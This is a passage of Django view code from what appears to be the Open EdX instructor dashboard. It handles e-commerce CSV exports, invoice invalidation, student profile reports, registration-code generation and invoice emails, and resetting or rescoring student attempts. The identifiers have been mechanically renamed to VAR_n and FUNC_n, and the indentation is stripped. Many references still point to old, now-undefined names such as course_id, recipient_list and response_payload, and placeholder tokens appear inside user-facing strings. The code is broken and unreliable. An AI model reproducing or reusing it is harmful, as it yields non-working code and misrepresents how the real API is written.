'course_id': VAR_10.to_deprecated_string(),
'sale': VAR_69,
'queried_features': VAR_68
}
return JsonResponse(VAR_63)
else:
VAR_86, VAR_73 = instructor_analytics.csvs.format_dictlist(VAR_69, VAR_68)
return instructor_analytics.csvs.create_csv_response("e-commerce_sale_invoice_records.csv", VAR_86, VAR_73)
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@FUNC_2('staff')
def FUNC_19(VAR_9, VAR_10): # pylint: disable=unused-argument
VAR_10 = SlashSeparatedCourseKey.from_deprecated_string(VAR_10)
VAR_68 = [
('id', 'Order Id'),
('company_name', 'Company Name'),
('company_contact_name', 'Company Contact Name'),
('company_contact_email', 'Company Contact Email'),
('logged_in_username', 'Login Username'),
('logged_in_email', 'Login User Email'),
('purchase_time', 'Date of Sale'),
('customer_reference_number', 'Customer Reference Number'),
('recipient_name', 'Recipient Name'),
('recipient_email', 'Recipient Email'),
('bill_to_street1', 'Street 1'),
('bill_to_street2', 'Street 2'),
('bill_to_city', 'City'),
('bill_to_state', 'State'),
('bill_to_postalcode', 'Postal Code'),
('bill_to_country', 'Country'),
('order_type', 'Order Type'),
('status', 'Order Item Status'),
('coupon_code', 'Coupon Code'),
('list_price', 'List Price'),
('unit_cost', 'Unit Price'),
('quantity', 'Quantity'),
('total_discount', 'Total Discount'),
('total_amount', 'Total Amount Paid'),
]
VAR_70 = [x[0] for x in VAR_68]
VAR_71 = [x[1] for x in VAR_68]
VAR_69 = instructor_analytics.basic.sale_order_record_features(VAR_10, VAR_70)
VAR_72, VAR_73 = instructor_analytics.csvs.format_dictlist(VAR_69, VAR_70)
return instructor_analytics.csvs.create_csv_response("e-commerce_sale_order_records.csv", VAR_71, VAR_73)
@FUNC_2('staff')
@require_POST
def FUNC_20(VAR_9, VAR_10):
try:
VAR_173 = VAR_9.POST["invoice_number"]
except KeyError:
return HttpResponseBadRequest("Missing required VAR_173 parameter")
try:
VAR_173 = int(VAR_173)
except ValueError:
return HttpResponseBadRequest(
"invoice_number must be an integer, {value} provided".format(
value=VAR_173
)
)
try:
VAR_174 = VAR_9.POST["event_type"]
except KeyError:
return HttpResponseBadRequest("Missing required VAR_174 parameter")
VAR_10 = SlashSeparatedCourseKey.from_deprecated_string(VAR_10)
try:
VAR_27 = CourseRegistrationCodeInvoiceItem.objects.select_related('invoice').get(
invoice_id=VAR_173,
VAR_10=course_id
)
VAR_27 = VAR_27.invoice
except CourseRegistrationCodeInvoiceItem.DoesNotExist: # Check for old type invoices
return HttpResponseNotFound(_("Invoice number '{num}' does not exist.").format(num=VAR_173))
if VAR_174 == "invalidate":
return FUNC_21(VAR_27)
else:
return FUNC_22(VAR_27)
def FUNC_21(VAR_27):
if not VAR_27.is_valid:
return HttpResponseBadRequest(_("The sale associated with this VAR_29 has already been invalidated."))
VAR_27.is_valid = False
VAR_27.save()
VAR_74 = _('Invoice number {0} has been invalidated.').format(VAR_27.id)
return JsonResponse({'message': VAR_74})
def FUNC_22(VAR_27):
if VAR_27.is_valid:
return HttpResponseBadRequest(_("This VAR_29 is already active."))
VAR_27.is_valid = True
VAR_27.save()
VAR_74 = _('The registration codes for VAR_29 {0} have been re-activated.').format(VAR_27.id)
return JsonResponse({'message': VAR_74})
@transaction.non_atomic_requests
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@FUNC_2('staff')
def FUNC_23(VAR_9, VAR_10):
VAR_38 = CourseKey.from_string(VAR_10)
VAR_75 = VAR_9.GET.get('csv', 'false')
VAR_68 = ['course_id', 'mode', 'total_issued_certificate', 'report_run_date']
VAR_76 = [
('course_id', _('CourseID')),
('mode', _('Certificate Type')),
('total_issued_certificate', _('Total Certificates Issued')),
('report_run_date', _('Date Report Run'))
]
VAR_77 = instructor_analytics.basic.issued_certificates(VAR_38, VAR_68)
if VAR_75.lower() == 'true':
VAR_72, VAR_81 = instructor_analytics.csvs.format_dictlist(VAR_77, VAR_68)
return instructor_analytics.csvs.create_csv_response(
'issued_certificates.csv',
[col_header for VAR_72, col_header in VAR_76],
VAR_81
)
else:
VAR_63 = {
'certificates': VAR_77,
'queried_features': VAR_68,
'feature_names': dict(VAR_76)
}
return JsonResponse(VAR_63)
@transaction.non_atomic_requests
@require_POST
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@FUNC_2('staff')
def FUNC_24(VAR_9, VAR_10, VAR_26=False): # pylint: disable=redefined-outer-VAR_16
VAR_38 = CourseKey.from_string(VAR_10)
VAR_65 = get_course_by_id(VAR_38)
VAR_78 = instructor_analytics.basic.AVAILABLE_FEATURES
VAR_68 = list(microsite.get_value('student_profile_download_fields', []))
if not VAR_68:
query_features = [
'id', 'username', 'name', 'email', 'language', 'location',
'year_of_birth', 'gender', 'level_of_education', 'mailing_address',
'goals',
]
VAR_76 = {
'id': _('User ID'),
'username': _('Username'),
'name': _('Name'),
'email': _('Email'),
'language': _('Language'),
'location': _('Location'),
'year_of_birth': _('Birth Year'),
'gender': _('Gender'),
'level_of_education': _('Level of Education'),
'mailing_address': _('Mailing Address'),
'goals': _('Goals'),
}
if is_course_cohorted(VAR_65.id):
VAR_68.append('cohort')
VAR_76['cohort'] = _('Cohort')
if VAR_65.teams_enabled:
VAR_68.append('team')
VAR_76['team'] = _('Team')
VAR_68.append('city')
VAR_76['city'] = _('City')
VAR_68.append('country')
VAR_76['country'] = _('Country')
if not VAR_26:
VAR_175 = instructor_analytics.basic.enrolled_students_features(VAR_38, VAR_68)
VAR_63 = {
'course_id': unicode(VAR_38),
'students': VAR_175,
'students_count': len(VAR_175),
'queried_features': VAR_68,
'feature_names': VAR_76,
'available_features': VAR_78,
}
return JsonResponse(VAR_63)
else:
try:
instructor_task.api.submit_calculate_students_features_csv(VAR_9, VAR_38, VAR_68)
VAR_172 = _("The enrolled learner VAR_54 report is being VAR_149."
" To view the status of the report, see Pending Tasks below.")
return JsonResponse({"status": VAR_172})
except AlreadyRunningError:
VAR_196 = _(
"This enrollment report is currently being VAR_149."
" To view the status of the report, see Pending Tasks below."
" You will be able to download the report when it is complete.")
return JsonResponse({"status": VAR_196})
@transaction.non_atomic_requests
@require_POST
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@FUNC_2('staff')
def FUNC_25(VAR_9, VAR_10):
VAR_38 = CourseKey.from_string(VAR_10)
VAR_68 = ['email']
try:
instructor_task.api.submit_calculate_may_enroll_csv(VAR_9, VAR_38, VAR_68)
VAR_172 = _(
"The enrollment report is being VAR_149. This report contains"
" information about learners who can enroll in the VAR_65."
" To view the status of the report, see Pending Tasks below."
)
return JsonResponse({"status": VAR_172})
except AlreadyRunningError:
VAR_196 = _(
"This enrollment report is currently being VAR_149."
" To view the status of the report, see Pending Tasks below."
" You will be able to download the report when it is complete."
)
return JsonResponse({"status": VAR_196})
@transaction.non_atomic_requests
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_POST
@FUNC_2('staff')
def FUNC_26(VAR_9, VAR_10):
VAR_38 = SlashSeparatedCourseKey.from_string(VAR_10)
try:
def FUNC_87(VAR_176, VAR_177):
with VAR_176.open(VAR_177) as f:
VAR_207 = unicodecsv.reader(UniversalNewlineIterator(f), encoding='utf-8')
try:
VAR_210 = next(VAR_207)
except StopIteration:
VAR_210 = []
VAR_180 = None
if "cohort" not in VAR_210:
VAR_180 = _("The file must contain a 'cohort' column containing cohort names.")
elif "email" not in VAR_210 and "username" not in VAR_210:
VAR_180 = _("The file must contain a 'username' column, an 'email' column, or both.")
if VAR_180:
raise FileValidationException(VAR_180)
VAR_72, VAR_123 = store_uploaded_file(
VAR_9, 'uploaded-file', ['.csv'],
course_and_time_based_filename_generator(VAR_38, "cohorts"),
max_file_size=2000000, # limit to 2 MB
FUNC_87=validator
)
instructor_task.api.submit_cohort_students(VAR_9, VAR_38, VAR_123)
except (FileValidationException, PermissionDenied) as err:
return JsonResponse({"error": unicode(err)}, status=400)
return JsonResponse()
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@FUNC_2('staff')
def FUNC_27(VAR_9, VAR_10): # pylint: disable=unused-argument
VAR_10 = SlashSeparatedCourseKey.from_deprecated_string(VAR_10)
VAR_79 = Coupon.objects.filter(VAR_10=course_id)
VAR_68 = [
('code', _('Coupon Code')),
('course_id', _('Course Id')),
('percentage_discount', _('% Discount')),
('description', _('Description')),
('expiration_date', _('Expiration Date')),
('is_active', _('Is Active')),
('code_redeemed_count', _('Code Redeemed Count')),
('total_discounted_seats', _('Total Discounted Seats')),
('total_discounted_amount', _('Total Discounted Amount')),
]
VAR_70 = [x[0] for x in VAR_68]
VAR_71 = [x[1] for x in VAR_68]
VAR_80 = instructor_analytics.basic.coupon_codes_features(VAR_70, VAR_79, VAR_10)
VAR_72, VAR_81 = instructor_analytics.csvs.format_dictlist(VAR_80, VAR_70)
return instructor_analytics.csvs.create_csv_response('Coupons.csv', VAR_71, VAR_81)
@transaction.non_atomic_requests
@require_POST
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@FUNC_2('staff')
@FUNC_5
def FUNC_28(VAR_9, VAR_10):
VAR_38 = SlashSeparatedCourseKey.from_deprecated_string(VAR_10)
try:
instructor_task.api.submit_detailed_enrollment_features_csv(VAR_9, VAR_38)
VAR_172 = _("The detailed enrollment report is being VAR_149."
" To view the status of the report, see Pending Tasks below.")
return JsonResponse({"status": VAR_172})
except AlreadyRunningError:
VAR_196 = _("The detailed enrollment report is being VAR_149."
" To view the status of the report, see Pending Tasks below."
" You will be able to download the report when it is complete.")
return JsonResponse({
"status": VAR_196
})
@transaction.non_atomic_requests
@require_POST
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@FUNC_2('staff')
@FUNC_5
def FUNC_29(VAR_9, VAR_10):
VAR_38 = SlashSeparatedCourseKey.from_deprecated_string(VAR_10)
try:
instructor_task.api.submit_executive_summary_report(VAR_9, VAR_38)
VAR_178 = _("The executive summary report is being VAR_149."
" To view the status of the report, see Pending Tasks below.")
except AlreadyRunningError:
VAR_178 = _(
"The executive summary report is currently being VAR_149."
" To view the status of the report, see Pending Tasks below."
" You will be able to download the report when it is complete."
)
return JsonResponse({
"status": VAR_178
})
@transaction.non_atomic_requests
@require_POST
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@FUNC_2('staff')
def FUNC_30(VAR_9, VAR_10):
VAR_38 = SlashSeparatedCourseKey.from_deprecated_string(VAR_10)
try:
instructor_task.api.submit_course_survey_report(VAR_9, VAR_38)
VAR_178 = _("The survey report is being VAR_149."
" To view the status of the report, see Pending Tasks below.")
except AlreadyRunningError:
VAR_178 = _(
"The survey report is currently being VAR_149."
" To view the status of the report, see Pending Tasks below."
" You will be able to download the report when it is complete."
)
return JsonResponse({
"status": VAR_178
})
@transaction.non_atomic_requests
@require_POST
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@FUNC_2('staff')
def FUNC_31(VAR_9, VAR_10):
VAR_68 = [
'user_email',
'exam_name',
'attempt_code',
'allowed_time_limit_mins',
'is_sample_attempt',
'started_at',
'completed_at',
'status',
]
VAR_38 = CourseKey.from_string(VAR_10)
try:
instructor_task.api.submit_proctored_exam_results_report(VAR_9, VAR_38, VAR_68)
VAR_178 = _("The proctored exam VAR_51 report is being VAR_149."
" To view the status of the report, see Pending Tasks below.")
except AlreadyRunningError:
VAR_178 = _(
"The proctored exam VAR_51 report is currently being VAR_149."
" To view the status of the report, see Pending Tasks below."
" You will be able to download the report when it is complete."
)
return JsonResponse({
"status": VAR_178
})
def FUNC_32(VAR_19, VAR_10, VAR_28, VAR_29=None, VAR_30=None, VAR_31=None):
VAR_82 = FUNC_34()
VAR_83 = Coupon.objects.filter(VAR_82=code, is_active=True)
if VAR_83:
return FUNC_32(
VAR_19, VAR_10, VAR_28, VAR_29=invoice, VAR_30=order, VAR_31=invoice_item
)
VAR_84 = CourseRegistrationCode(
VAR_82=code,
VAR_10=unicode(VAR_10),
created_by=VAR_19,
VAR_29=invoice,
VAR_30=order,
VAR_28=mode_slug,
VAR_31=invoice_item
)
try:
with transaction.atomic():
VAR_84.save()
return VAR_84
except IntegrityError:
return FUNC_32(
VAR_19, VAR_10, VAR_28, VAR_29=invoice, VAR_30=order, VAR_31=invoice_item
)
def FUNC_33(VAR_32, VAR_33, VAR_34=None):
VAR_68 = [
'code', 'redeem_code_url', 'course_id', 'company_name', 'created_by',
'redeemed_by', 'invoice_id', 'purchaser', 'customer_reference_number', 'internal_reference', 'is_valid'
]
VAR_85 = instructor_analytics.basic.course_registration_features(VAR_68, VAR_33, VAR_34)
VAR_86, VAR_81 = instructor_analytics.csvs.format_dictlist(VAR_85, VAR_68)
return instructor_analytics.csvs.create_csv_response(VAR_32, VAR_86, VAR_81)
def FUNC_34():
VAR_87 = getattr(settings, 'REGISTRATION_CODE_LENGTH', 8)
return FUNC_7(VAR_87)
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@FUNC_2('staff')
@require_POST
def FUNC_35(VAR_9, VAR_10):
VAR_10 = SlashSeparatedCourseKey.from_deprecated_string(VAR_10)
VAR_85 = CourseRegistrationCode.objects.filter(
VAR_10=course_id
).order_by('invoice_item__invoice__company_name')
VAR_88 = VAR_9.POST['download_company_name']
if VAR_88:
VAR_85 = registration_codes.filter(invoice_item__invoice__company_name=VAR_88)
VAR_34 = 'download'
return FUNC_33("Registration_Codes.csv", VAR_85, VAR_34)
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@FUNC_4
@require_POST
def FUNC_36(VAR_9, VAR_10):
VAR_10 = CourseKey.from_string(VAR_10)
VAR_89 = False
try:
VAR_179 = int(VAR_9.POST['total_registration_codes'])
except ValueError:
VAR_179 = int(float(VAR_9.POST['total_registration_codes']))
VAR_88 = VAR_9.POST['company_name']
VAR_90 = VAR_9.POST['company_contact_name']
VAR_91 = VAR_9.POST['company_contact_email']
VAR_92 = VAR_9.POST['unit_price']
try:
VAR_92 = (
decimal.Decimal(VAR_92)
).quantize(
decimal.Decimal('.01'),
rounding=decimal.ROUND_DOWN
)
except decimal.InvalidOperation:
return HttpResponse(
status=400,
content=_(u"Could not parse amount as a decimal")
)
VAR_93 = VAR_9.POST['recipient_name']
VAR_94 = VAR_9.POST['recipient_email']
VAR_95 = VAR_9.POST['address_line_1']
VAR_96 = VAR_9.POST['address_line_2']
VAR_97 = VAR_9.POST['address_line_3']
VAR_98 = VAR_9.POST['city']
VAR_99 = VAR_9.POST['state']
VAR_100 = VAR_9.POST['zip']
VAR_17 = VAR_9.POST['country']
VAR_101 = VAR_9.POST['internal_reference']
VAR_102 = VAR_9.POST['customer_reference_number']
VAR_103 = [VAR_94]
if VAR_9.POST.get('invoice', False):
VAR_103.append(VAR_9.user.email)
VAR_89 = True
VAR_104 = VAR_92 * VAR_179
set_user_preference(VAR_9.user, INVOICE_KEY, VAR_89)
VAR_105 = Invoice.objects.create(
total_amount=VAR_104,
VAR_88=company_name,
VAR_91=company_contact_email,
VAR_90=company_contact_name,
VAR_10=course_id,
VAR_93=recipient_name,
VAR_94=recipient_email,
VAR_95=address_line_1,
VAR_96=address_line_2,
VAR_97=address_line_3,
VAR_98=city,
VAR_99=state,
zip=VAR_100,
VAR_17=country,
VAR_101=internal_reference,
VAR_102=customer_reference_number
)
VAR_31 = CourseRegistrationCodeInvoiceItem.objects.create(
VAR_29=VAR_105,
qty=VAR_179,
VAR_92=unit_price,
VAR_10=course_id
)
VAR_65 = get_course_by_id(VAR_10, depth=0)
VAR_106 = CourseMode.paid_modes_for_course(VAR_10)
if len(VAR_106) != 1:
VAR_180 = (
u"Generating Code Redeem Codes for Course '{VAR_10}', which must have a single paid VAR_65 VAR_20. "
u"This is a configuration issue. Current VAR_65 modes with payment options: {VAR_106}"
).format(VAR_10=course_id, VAR_106=paid_modes)
VAR_0.error(VAR_180)
return HttpResponse(
status=500,
content=_(u"Unable to generate redeem codes because of VAR_65 misconfiguration.")
)
VAR_24 = VAR_106[0]
VAR_107 = VAR_24.min_price
VAR_85 = []
for VAR_72 in range(VAR_179):
VAR_181 = FUNC_32(
VAR_9.user, VAR_10, VAR_24.slug, VAR_29=VAR_105, VAR_30=None, VAR_31=invoice_item
)
VAR_85.append(VAR_181)
VAR_108 = microsite.get_value('SITE_NAME', 'localhost')
VAR_109 = VAR_179
VAR_110 = (float(VAR_109 * VAR_107) - float(VAR_104))
VAR_111 = '{base_url}{course_about}'.format(
base_url=microsite.get_value('SITE_NAME', settings.SITE_NAME),
course_about=reverse('about_course', VAR_3={'course_id': VAR_10.to_deprecated_string()})
)
VAR_112 = '{base_url}{dashboard}'.format(
base_url=microsite.get_value('SITE_NAME', settings.SITE_NAME),
dashboard=reverse('dashboard')
)
try:
VAR_182 = VAR_105.generate_pdf_invoice(VAR_65, VAR_107, int(VAR_109), float(VAR_104))
except Exception: # pylint: disable=broad-except
VAR_0.exception('Exception at creating pdf file.')
VAR_182 = None
VAR_113 = theming_helpers.get_value('email_from_address', settings.DEFAULT_FROM_EMAIL)
VAR_114 = {
'invoice': VAR_105,
'site_name': VAR_108,
'course': VAR_65,
'course_price': VAR_107,
'sub_total': VAR_107 * VAR_109,
'discount': VAR_110,
'sale_price': VAR_104,
'quantity': VAR_109,
'registration_codes': VAR_85,
'currency_symbol': settings.PAID_COURSE_REGISTRATION_CURRENCY[1],
'course_url': VAR_111,
'platform_name': microsite.get_value('platform_name', settings.PLATFORM_NAME),
'dashboard_url': VAR_112,
'contact_email': VAR_113,
'corp_address': microsite.get_value('invoice_corp_address', settings.INVOICE_CORP_ADDRESS),
'payment_instructions': microsite.get_value('invoice_payment_instructions', settings. INVOICE_PAYMENT_INSTRUCTIONS),
'date': time.strftime("%m/%d/%Y")
}
VAR_115 = u'Confirmation and Invoice for {course_name}'.format(course_name=VAR_65.display_name)
VAR_74 = render_to_string('emails/registration_codes_sale_email.txt', VAR_114)
VAR_116 = render_to_string('emails/registration_codes_sale_invoice_attachment.txt', VAR_114)
VAR_117 = StringIO.StringIO()
VAR_118 = VAR_26.writer(VAR_117)
for registration_code in VAR_85:
VAR_183 = 'http://{base_url}{redeem_code_url}'.format(
base_url=microsite.get_value('SITE_NAME', settings.SITE_NAME),
redeem_code_url=reverse('register_code_redemption', VAR_3={'registration_code': registration_code.code})
)
VAR_118.writerow([registration_code.code, VAR_183])
VAR_119 = microsite.get_value('finance_email', settings.FINANCE_EMAIL)
if VAR_119:
recipient_list.append(VAR_119)
for recipient in VAR_103:
VAR_14 = EmailMessage()
VAR_14.subject = VAR_115
VAR_14.body = VAR_74
VAR_14.from_email = VAR_113
VAR_14.to = [recipient]
VAR_14.attach(u'RegistrationCodes.csv', VAR_117.getvalue(), 'text/csv')
VAR_14.attach(u'Invoice.txt', VAR_116, 'text/plain')
if VAR_182 is not None:
VAR_14.attach(u'Invoice.pdf', VAR_182.getvalue(), 'application/pdf')
else:
VAR_198 = StringIO.StringIO(_('pdf download unavailable right now, please contact support.'))
VAR_14.attach(u'pdf_unavailable.txt', VAR_198.getvalue(), 'text/plain')
VAR_14.send()
return FUNC_33("Registration_Codes.csv", VAR_85)
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@FUNC_2('staff')
@require_POST
def FUNC_37(VAR_9, VAR_10):
VAR_10 = SlashSeparatedCourseKey.from_deprecated_string(VAR_10)
VAR_120 = CourseRegistrationCode.objects.filter(
VAR_10=course_id
).order_by('invoice_item__invoice__company_name')
VAR_88 = VAR_9.POST['active_company_name']
if VAR_88:
VAR_120 = registration_codes_list.filter(invoice_item__invoice__company_name=VAR_88)
VAR_121 = RegistrationCodeRedemption.objects.select_related(
'registration_code', 'registration_code__invoice_item__invoice'
).filter(registration_code__course_id=VAR_10)
if VAR_121.exists():
VAR_184 = [VAR_82.registration_code.code for VAR_82 in VAR_121]
VAR_120 = registration_codes_list.exclude(code__in=VAR_184)
return FUNC_33("Active_Registration_Codes.csv", VAR_120)
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@FUNC_2('staff')
@require_POST
def FUNC_38(VAR_9, VAR_10):
VAR_10 = SlashSeparatedCourseKey.from_deprecated_string(VAR_10)
VAR_121 = RegistrationCodeRedemption.objects.select_related('registration_code').filter(
registration_code__course_id=VAR_10
)
VAR_122 = []
if VAR_121.exists():
VAR_184 = [VAR_82.registration_code.code for VAR_82 in VAR_121]
VAR_122 = CourseRegistrationCode.objects.filter(
VAR_10=course_id, code__in=VAR_184
).order_by('invoice_item__invoice__company_name').select_related('invoice_item__invoice')
VAR_88 = VAR_9.POST['spent_company_name']
if VAR_88:
VAR_122 = spent_codes_list.filter(invoice_item__invoice__company_name=VAR_88) # pylint: disable=maybe-no-member
VAR_34 = 'spent'
return FUNC_33("Spent_Registration_Codes.csv", VAR_122, VAR_34)
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@FUNC_2('staff')
def FUNC_39(VAR_9, VAR_10): # pylint: disable=unused-argument
VAR_10 = SlashSeparatedCourseKey.from_deprecated_string(VAR_10)
def FUNC_85(VAR_123, VAR_86, VAR_124):
VAR_185 = HttpResponse(content_type='text/csv')
VAR_185['Content-Disposition'] = 'attachment; VAR_123={0}'.format(unicode(VAR_123).encode('utf-8'))
VAR_186 = VAR_26.writer(VAR_185, dialect='excel', quotechar='"', quoting=VAR_26.QUOTE_ALL)
VAR_187 = [unicode(s).encode('utf-8') for s in VAR_86]
VAR_186.writerow(VAR_187)
for row in VAR_124:
VAR_187 = [unicode(s).encode('utf-8') for s in row]
VAR_186.writerow(VAR_187)
return VAR_185
VAR_125 = User.objects.filter(
courseenrollment__course_id=VAR_10,
).order_by('id')
VAR_86 = ['User ID', 'Anonymized User ID', 'Course Specific Anonymized User ID']
VAR_124 = [[s.id, unique_id_for_user(s, save=False), anonymous_id_for_user(s, VAR_10, save=False)] for s in VAR_125]
return FUNC_85(VAR_10.to_deprecated_string().replace('/', '-') + '-anon-ids.csv', VAR_86, VAR_124)
@require_POST
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@FUNC_0
@FUNC_2('staff')
@FUNC_1(
VAR_141="email or VAR_15 of VAR_40 for whom to get progress url"
)
def FUNC_40(VAR_9, VAR_10):
VAR_10 = SlashSeparatedCourseKey.from_deprecated_string(VAR_10)
VAR_19 = get_student_from_identifier(VAR_9.POST.get('unique_student_identifier'))
VAR_126 = reverse('student_progress', VAR_3={'course_id': VAR_10.to_deprecated_string(), 'student_id': VAR_19.id})
VAR_63 = {
'course_id': VAR_10.to_deprecated_string(),
'progress_url': VAR_126,
}
return JsonResponse(VAR_63)
@transaction.non_atomic_requests
@require_POST
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@FUNC_2('staff')
@FUNC_1(
VAR_127="problem urlname to reset"
)
@FUNC_0
def FUNC_41(VAR_9, VAR_10):
VAR_10 = SlashSeparatedCourseKey.from_deprecated_string(VAR_10)
VAR_65 = get_course_with_access(
VAR_9.user, 'staff', VAR_10, depth=None
)
VAR_127 = strip_if_string(VAR_9.POST.get('problem_to_reset'))
VAR_128 = VAR_9.POST.get('unique_student_identifier', None)
VAR_40 = None
if VAR_128 is not None:
VAR_40 = get_student_from_identifier(VAR_128)
VAR_129 = VAR_9.POST.get('all_students', False) in ['true', 'True', True]
VAR_130 = VAR_9.POST.get('delete_module', False) in ['true', 'True', True]
if VAR_129 and VAR_40:
return HttpResponseBadRequest(
"all_students and VAR_141 are mutually exclusive."
)
if VAR_129 and VAR_130:
return HttpResponseBadRequest(
"all_students and VAR_130 are mutually exclusive."
)
if VAR_129 or VAR_130:
if not has_access(VAR_9.user, 'instructor', VAR_65):
return HttpResponseForbidden("Requires instructor VAR_165.")
try:
VAR_188 = VAR_10.make_usage_key_from_deprecated_string(VAR_127)
except InvalidKeyError:
return HttpResponseBadRequest()
VAR_63 = {}
response_payload['problem_to_reset'] = VAR_127
if VAR_40:
try:
enrollment.reset_student_attempts(
VAR_10,
VAR_40,
VAR_188,
requesting_user=VAR_9.user,
VAR_130=delete_module
)
except StudentModule.DoesNotExist:
return HttpResponseBadRequest(_("Module does not exist."))
except sub_api.SubmissionError:
VAR_208 = _("An VAR_169 occurred while deleting the score.")
return HttpResponse(VAR_208, status=500)
VAR_63['student'] = VAR_128
elif VAR_129:
instructor_task.api.submit_reset_problem_attempts_for_all_students(VAR_9, VAR_188)
VAR_63['task'] = 'created'
VAR_63['student'] = 'All Students'
else:
return HttpResponseBadRequest()
return JsonResponse(VAR_63)
@transaction.non_atomic_requests
@require_POST
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@FUNC_2('staff')
@FUNC_0
def FUNC_42(VAR_9, VAR_10): # pylint: disable=invalid-VAR_16
VAR_10 = SlashSeparatedCourseKey.from_deprecated_string(VAR_10)
VAR_65 = get_course_with_access(
VAR_9.user, 'staff', VAR_10, depth=None
)
if not VAR_65.entrance_exam_id:
return HttpResponseBadRequest(
_("Course has no entrance exam VAR_39.")
)
VAR_128 = VAR_9.POST.get('unique_student_identifier', None)
VAR_40 = None
if VAR_128 is not None:
VAR_40 = get_student_from_identifier(VAR_128)
VAR_129 = VAR_9.POST.get('all_students', False) in ['true', 'True', True]
VAR_130 = VAR_9.POST.get('delete_module', False) in ['true', 'True', True]
if VAR_129 and VAR_40:
return HttpResponseBadRequest(
_("all_students and VAR_141 are mutually exclusive.")
)
if VAR_129 and VAR_130:
return HttpResponseBadRequest(
_("all_students and VAR_130 are mutually exclusive.")
)
if VAR_129 or VAR_130:
if not has_access(VAR_9.user, 'instructor', VAR_65):
return HttpResponseForbidden(_("Requires instructor VAR_165."))
try:
VAR_189 = VAR_10.make_usage_key_from_deprecated_string(VAR_65.entrance_exam_id)
if VAR_130:
instructor_task.api.submit_delete_entrance_exam_state_for_student(VAR_9, VAR_189, VAR_40)
else:
instructor_task.api.submit_reset_problem_attempts_in_entrance_exam(VAR_9, VAR_189, VAR_40)
except InvalidKeyError:
return HttpResponseBadRequest(_("Course has no valid entrance exam VAR_39."))
VAR_63 = {'student': VAR_128 or _('All Students'), 'task': 'created'}
return JsonResponse(VAR_63)
@transaction.non_atomic_requests
@require_POST
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@FUNC_2('instructor')
@FUNC_1(VAR_127="problem urlname to reset")
@FUNC_0
def FUNC_43(VAR_9, VAR_10):
VAR_10 = SlashSeparatedCourseKey.from_deprecated_string(VAR_10)
VAR_127 = strip_if_string(VAR_9.POST.get('problem_to_reset'))
VAR_128 = VAR_9.POST.get('unique_student_identifier', None)
VAR_40 = None
if VAR_128 is not None:
VAR_40 = get_student_from_identifier(VAR_128)
VAR_129 = VAR_9.POST.get('all_students') in ['true', 'True', True]
if not (VAR_127 and (VAR_129 or VAR_40)):
return HttpResponseBadRequest("Missing query parameters.")
if VAR_129 and VAR_40:
return HttpResponseBadRequest(
"Cannot rescore with VAR_129 and VAR_141."
)
try:
VAR_188 = VAR_10.make_usage_key_from_deprecated_string(VAR_127)
except InvalidKeyError:
return HttpResponseBadRequest("Unable to parse problem id")
VAR_63 = {}
response_payload['problem_to_reset'] = VAR_127
if VAR_40:
VAR_63['student'] = VAR_128
instructor_task.api.submit_rescore_problem_for_student(VAR_9, VAR_188, VAR_40)
VAR_63['task'] = 'created'
elif VAR_129:
instructor_task.api.submit_rescore_problem_for_all_students(VAR_9, VAR_188)
VAR_63['task'] = 'created'
else:
return HttpResponseBadRequest()
return JsonResponse(VAR_63)
@transaction.non_atomic_requests
@require_POST
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@FUNC_2('instructor')
@FUNC_0
def FUNC_44(VAR_9, VAR_10):
VAR_10 = SlashSeparatedCourseKey.from_deprecated_string(VAR_10)
VAR_65 = get_course_with_access(
VAR_9.user, 'staff', VAR_10, depth=None
)
VAR_128 = VAR_9.POST.get('unique_student_identifier', None)
VAR_40 = None
if VAR_128 is not None:
VAR_40 = get_student_from_identifier(VAR_128)
VAR_129 = VAR_9.POST.get('all_students') in ['true', 'True', True]
if not VAR_65.entrance_exam_id:
return HttpResponseBadRequest(
_("Course has no entrance exam VAR_39.")
)
if VAR_129 and VAR_40:
return HttpResponseBadRequest(
_("Cannot rescore with VAR_129 and VAR_141.")
)
try:
VAR_189 = VAR_10.make_usage_key_from_deprecated_string(VAR_65.entrance_exam_id)
except InvalidKeyError:
return HttpResponseBadRequest(_("Course has no valid entrance exam VAR_39."))
VAR_63 = {}
if VAR_40:
VAR_63['student'] = VAR_128
else:
VAR_63['student'] = _("All Students")
instructor_task.api.submit_rescore_entrance_exam_for_student(VAR_9, VAR_189, VAR_40)
VAR_63['task'] = 'created'
return JsonResponse(VAR_63)
@require_POST
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@FUNC_2('staff')
def FUNC_45(VAR_9, VAR_10): # pylint: disable=unused-argument
VAR_10 = SlashSeparatedCourseKey.from_deprecated_string(VAR_10)
VAR_131 = 'bulk_course_email'
VAR_132 = instructor_task.api.get_instructor_task_history(VAR_10, VAR_131=task_type)
VAR_63 = {
'tasks': map(extract_task_features, VAR_132),
}
return JsonResponse(VAR_63)
@require_POST
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@FUNC_2('staff')
def FUNC_46(VAR_9, VAR_10): # pylint: disable=unused-argument
